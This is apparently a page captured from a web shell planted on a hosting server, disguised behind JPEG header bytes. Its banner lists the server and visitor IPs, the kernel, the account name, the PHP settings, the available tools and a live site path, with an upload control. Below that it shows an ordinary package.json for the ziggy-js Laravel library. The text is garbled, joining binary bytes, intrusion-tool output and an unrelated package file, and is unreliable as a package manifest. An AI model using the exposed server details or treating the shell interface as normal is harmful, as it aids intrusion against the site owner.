����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 52.15.122.33 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/cbt.gltechlimited.com/vendor/tightenco/ziggy/ |
Upload File : |
{ "name": "ziggy-js", "version": "1.1.0", "description": "Use your Laravel named routes in JavaScript.", "keywords": [ "laravel", "routes", "ziggy" ], "homepage": "https://github.com/tighten/ziggy", "bugs": "https://github.com/tighten/ziggy/issues", "license": "MIT", "authors": [ { "name": "Daniel Coulbourne", "email": "daniel@tighten.co" }, { "name": "Jake Bathman", "email": "jake@tighten.co" }, { "name": "Jacob Baker-Kretzmar", "email": "jacob@tighten.co" } ], "files": [ "src/js", "dist" ], "source": "src/js/index.js", "main": "dist/index.js", "umd:main": "dist/index.js", "unpkg": "dist/index.js", "browser": "dist/index.js", "module": "dist/index.m.js", "esmodule": "dist/index.es.js", "repository": { "type": "git", "url": "https://github.com/tighten/ziggy.git" }, "scripts": { "build": "microbundle --name route --format modern,es,umd --external none --no-sourcemap", "watch": "npm run build watch", "build:npm": "microbundle --name route --format modern,es,umd --no-sourcemap", "test": "jest", "prepublishOnly": "npm run build:npm" }, "mangle": { "regex": "^_(?!query)" }, "dependencies": { "qs": "^6.8.0" }, "devDependencies": { "@babel/preset-env": "^7.11.0", "babel-preset-power-assert": "^3.0.0", "jest": "^26.2.2", "microbundle": "^0.12.3", "power-assert": "^1.6.1" } }